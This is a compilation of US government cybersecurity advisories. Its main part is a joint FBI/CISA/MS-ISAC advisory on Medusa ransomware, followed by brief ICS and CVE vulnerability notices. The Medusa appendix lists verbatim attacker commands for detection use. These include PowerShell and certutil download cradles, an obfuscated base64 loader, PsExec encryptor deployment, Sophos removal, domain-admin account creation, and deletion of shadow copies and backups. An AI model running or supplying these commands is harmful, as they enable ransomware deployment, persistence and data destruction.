Table 1 lists the hashes of malicious files obtained during investigations.
| Files | Hash (MD5) | Description |
|---|---|---|
| !!!READ_ME_MEDUSA!!!.txt | Redacted | Ransom note file |
| openrdp.bat | 44370f5c977e415981febf7dbb87a85c | Allows incoming RDP and remote WMI connections |
| pu.exe | 80d852cd199ac923205b61658a9ec5bc | Reverse shell |
Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.
| Email Addresses | Description |
|---|---|
| key.medusa.serviceteam@protonmail.com | Used for ransom negotiation |
| medusa.support@onionmail.org | Used for ransom negotiation |
| mds.svt.breach@protonmail.com | Used for ransom negotiation |
| mds.svt.mir2@protonmail.com | Used for ransom negotiation |
| MedusaSupport@cock.li | Used for ransom negotiation |
See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures. |
| Initial Access | TA0001 | Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access. |
| Phishing | T1566 | Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims. |
| Technique Title | ID | Use |
|---|---|---|
| Indicator Removal: Clear Command History | T1070.003 | Medusa actors attempt to cover their tracks by deleting the PowerShell command line history. |
| Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 | Medusa actors use a well-known evasion technique that executes a base64 encrypted command. |
| Obfuscated Files or Information | T1027 | Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable. |
| Indicator Removal | T1070 | Medusa actors deleted their previous work and tools installed. |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Medusa actors killed or deleted endpoint detection and response tools. |
| Technique Title | ID | Use |
|---|---|---|
| Network Service Discovery | T1046 | Medusa actors utilized living of the land techniques to perform network enumeration. |
| File and Directory Discovery | T1083 | Medusa actors utilized Windows Command Prompt for filesystem enumeration. |
| Network Share Discovery | T1135 | Medusa actors queried shared drives on the local system to gather sources of information. |
| System Network Configuration Discovery | T1016 | Medusa actors used operating system administrative utilities to gather network information. |
| System Information Discovery | T1082 | Medusa actors used the command systeminfo to gather detailed system information. |
| Permission Groups Discovery: Domain Groups | T1069.002 | Medusa actors attempt to find domain-level group and permission settings. |
| Technique Title | ID | Use |
|---|---|---|
| Credential Access | TA0006 | Medusa actors harvest credentials with tools like Mimikatz to gain access to systems. |
| OS Credential Dumping: LSASS Memory | T1003.001 | Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz. |
| Technique Title | ID | Use |
|---|---|---|
| Lateral Movement | TA0008 | Medusa actors performed techniques to move laterally without detection once they gained initial access. |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration. |
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. |
| Software Deployment Tools | T1072 | Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network. |
| Remote Services: Remote Desktop Protocol | T1021.001 | Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally. |
| System Services | T1569.002 | Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network. |
| Windows Management Instrumentation | T1047 | Medusa actors abused Windows Management Instrumentation to query system information. |
| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | TA0010 | Medusa actors identified files to exfiltrate out of victim networks. |
| Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers. |
| Technique Title | ID | Use |
|---|---|---|
| Ingress Tool Transfer | T1105 | Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress. |
| Application Layer Protocol: Web Protocols | T1071.001 | Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS. |
| Remote Access Software | T1219 | Medusa actors used remote access software to move laterally through the network. |
| Technique Title | ID | Use |
|---|---|---|
| Create Account | T1136.002 | Medusa actors created a domain account to maintain access to victim systems. |
| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | T1486 | Medusa identified and encrypted data on target systems to interrupt availability to system and network resources. |
| Inhibit System Recovery | T1490 | The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note. |
| Financial Theft | T1657 | Victims must pay to decrypt files and prevent further release by Medusa actors. |
| System Shutdown/Reboot | T1529 | Medusa actors manually turned off and encrypted virtual machines. |
| Service Stop | T1489 | The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites, |
FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.
FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC.
ConnectWise contributed to this advisory.
March 12, 2025: Initial version.
These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.
| cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll |
| cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi |
| cmd.exe /c driverquery |
| cmd.exe /c echo Computer: %COMPUTERNAME% & ` echo Username: %USERNAME% & ` echo Domain: %USERDOMAIN% & ` echo Logon Server: %LOGONSERVER% & ` echo DNS Domain: %USERDNSDOMAIN% & ` echo User Profile: %USERPROFILE% & echo ` System Root: %SYSTEMROOT% |
| cmd.exe /c ipconfig /all [T1016] |
| cmd.exe /c net share [T1135] |
| cmd.exe /c net use |
| cmd.exe /c netstat -a |
| cmd.exe /c sc query |
| cmd.exe /c schtasks |
| cmd.exe /c systeminfo [T1082] |
| cmd.exe /c ver |
| cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname |
| cmd.exe /c wmic printjob |
| mmc.exe compmgmt.msc /computer:{hostname/ip} |
| mstsc.exe /v:{hostname/ip} |
| mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass} |
| powershell -exec bypass -enc <base64 encrypted command string> |
| powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RMM tool>.msi) |
|
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('<base64 payload string>')-f'<character replacement 0>', '<character replacement 1>','<character replacement 2>')))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
| powershell Remove-Item (Get-PSReadlineOption).HistorySavePath |
|
powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path <file path> -NoTypeInformation -Encoding UTF8 |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe" |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe" |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat |
| psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat |
| nltest /dclist: |
| net group "domain admins" /domain [T1069.002] |
| net group "Domain Admins" default /add /domain |
| net group "Enterprise Admins" default /add /domain |
| net group "Remote Desktop Users" default /add /domain |
| net group "Group Policy Creator Owners" default /add /domain |
| net group "Schema Admins" default /add /domain |
| net group "domain users" /domain |
| net user default /active:yes /domain |
| net user /add default <password> /domain [T1136.002] |
| query user |
| reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 |
| systeminfo |
| vssadmin.exe Delete Shadows /all /quiet |
| vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded |
| del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk |
| netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow |
| netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
CISA released two Industrial Control Systems (ICS) advisories on March 11, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.
CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication, gain control over the products, or impersonate the web applications.
The following versions of Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool are affected:
Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain a hard coded secret key. This could allow an attacker to generate valid JWT (JSON Web Token) sessions.
CVE-2025-2079 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2025-2079. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products.
CVE-2025-2080 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-2080. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 are vulnerable to an attacker impersonating the web application service and mislead victim clients.
CVE-2025-2081 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2025-2081. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).
Tomer Goldschmidt of Claroty Team82 reported these vulnerabilities to CISA.
Optigo Networks recommends users to upgrade to the following:
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
Successful exploitation of this vulnerability could allow an attacker to perform a denial of service.
Schneider Electric reports the following products are affected:
Schneider Electric Uni-Telway Driver is vulnerable to an improper input validation vulnerability that could cause denial-of-service of engineering workstations when a specific driver interface is invoked locally by an authenticated user with crafted input.
CVE-2024-10083 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2024-10083. A base score of 6.8 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Sangjun Park, Jongseoung Kim, Byunghyun Kang, Yunjin Park, Albert Einstein, Kwon Yul, Seungchan Kim of today-0day reported this vulnerability to Schneider Electric.
Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk:
For users requiring the use of Uni-Telway Driver, Schneider Electric recommends using following mitigations to reduce the risk of exploit:
For more information see the associated Schneider Electric CPCERT security advisory SEVD-2025-042-02 Uni-Telway driver used in EcoStruxureTM Control Expert, EcoStruxureTM Process - SEVD-2025-042-02 PDF Version, Uni-Telway driver used in EcoStruxureTM Control Expert, EcoStruxureTM Process - SEVD-2025-042-02 CSAF Version.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
The Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) has released an alert warning of a scam involving criminal actors masquerading as the “BianLian Group.” The cyber criminals target corporate executives by sending extortion letters threatening to release victims’ sensitive information unless payment is received.
CISA encourages organizations to review the following FBI Public Service Announcement for more information:
Organizations should report incidents and anomalous activity to CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870.
CISA released three Industrial Control Systems (ICS) advisories on March 6, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.
Exploitation of these vulnerabilities could allow an attacker to access or decrypt sensitive data, crash the device application, or cause a denial-of-service condition.
Hitachi Energy reports that the following products are affected:
There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial-of-service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.
CVE-2023-0286 has been assigned to this vulnerability. A CVSS v3 base score of 7.4 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H).
An invalid pointer dereference on read can be triggered when an application tries to check a malformed DSA public key by the EVP_PKEY_public_check() function. This will most likely lead to an application crash. This function can be called on public keys supplied from untrusted sources which could allow an attacker to cause a denial-of-service attack. The TLS implementation in OpenSSL does not call this function but applications might call the function if there are additional security requirements imposed by standards such as FIPS 140-3.
CVE-2023-0217 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
An invalid pointer dereference on read can be triggered when an application tries to load malformed PKCS7 data with the d2i_PKCS7(), d2i_PKCS7_bio() or d2i_PKCS7_fp() functions. The result of the dereference is an application crash which could lead to a denial-of-service attack. The TLS implementation in OpenSSL does not call this function however third party applications might call these functions on untrusted data.
CVE-2023-0216 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
A NULL pointer can be dereferenced when signatures are being verified on PKCS7 signed or signedAndEnveloped data. In case the hash algorithm used for the signature is known to the OpenSSL library but the implementation of the hash algorithm is not available, the digest initialization will fail. There is a missing check for the return value from the initialization function which later leads to invalid usage of the digest API most likely leading to a crash. The unavailability of an algorithm can be caused by using FIPS enabled configuration of providers or more commonly by not loading the legacy provider. PKCS7 data is processed by the SMIME library calls and also by the time stamp (TS) library calls. The TLS implementation in OpenSSL does not call these functions, however third party applications would be affected if they call these functions to verify signatures on untrusted data.
CVE-2023-0401 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter BIO onto the front of it to form a BIO chain, and then returns the new head of the BIO chain to the caller. Under certain conditions, for example if a CMS recipient public key is invalid, the new filter BIO is freed and the function returns a NULL result indicating a failure. However, in this case, the BIO chain is not properly cleaned up and the BIO passed by the caller still retains internal pointers to the previously freed filter BIO. If the caller then goes on to call BIO_pop() on the BIO then a use-after-free will occur. This will most likely result in a crash. This scenario occurs directly in the internal function B64_write_ASN1() which may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on the BIO. This internal function is in turn called by the public API functions PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. Other public API functions that may be impacted by this include i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and i2d_PKCS7_bio_stream. The OpenSSL cms and smime command line applications are similarly affected.
CVE-2023-0215 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial-of-service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.
CVE-2022-4450 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
A timing-based side channel exists in the OpenSSL RSA decryption implementation which could be sufficient to recover plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption, an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.
CVE-2022-4304 has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
A read buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. The read buffer overrun might result in a crash which could lead to a denial-of-service attack. In theory it could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext) although we are not aware of any working exploit leading to memory contents disclosure as of the time of release of this advisory. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.
CVE-2022-4203 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
A researcher from Dragos reported these vulnerabilities to Hitachi Energy.
Hitachi Energy has identified the following specific workarounds and mitigations users can apply to reduce risk:
For more information see the associated Hitachi Energy PSIRT security advisory 8dbd000213 CYBERSECURITY ADVISORY - OpenSSL Vulnerabilities in Hitachi Energy PCU400 Product.
Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
Successful exploitation of this vulnerability could allow anyone with user credentials to bypass the security controls enforced by the product.
Hitachi Energy reports the following products are affected:
A vulnerability exists in the database schema inside the product. An attacker could exploit the vulnerability by gaining access to credentials of any account or to have access to a session ticket issued for an account. Then, through the configuration tool that accesses the proprietary Open Database Connectivity (ODBC) protocol (TCP 2102), the database table can be manipulated for privilege escalation, which then allows unauthorized modification or to permanently disabling of the device.
CVE-2021-35534 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2021-35534. A base score of 8.6 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Hitachi Energy PSIRT reported this vulnerability to CISA.
Hitachi Energy has identified the following recommended immediate actions for each affected version:
For more information see the associated Hitachi Energy PSIRT security advisory 8DBD000058 Cybersecurity Advisory - Insufficient Security Control Vulnerability in Hitachi Energy Relion 670/650/SAM600-IO series Products.
Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Open Database Connectivity (ODBC) protocol that is used for device configuration should be limited within the substation only. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
